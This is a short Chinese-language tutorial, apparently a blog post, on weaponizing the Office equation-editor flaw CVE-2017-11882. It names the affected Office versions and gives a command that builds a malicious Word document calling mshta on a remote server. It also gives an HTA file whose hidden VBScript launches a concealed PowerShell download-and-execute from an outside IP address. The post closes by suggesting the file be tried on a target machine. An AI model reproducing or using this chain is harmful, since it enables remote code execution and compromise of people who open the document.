影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
我只测试了2007下面开始干
github地址:https://github.com/Ridter/CVE-2017-11882/
下载以后就去生成test.doc哈
python Command43b_CVE-2017-11882.py -c "mshta http://3as0n.cn:8000/abc" -o test.doc
然后在vps上去新建一个文件,名字就是abc吧,里面的内容为下面这个

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring("http://139.155.2.101:6677/a"))'"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
然后把生成的文件放我们的靶机里面试试下效果哈

33.jpg

preView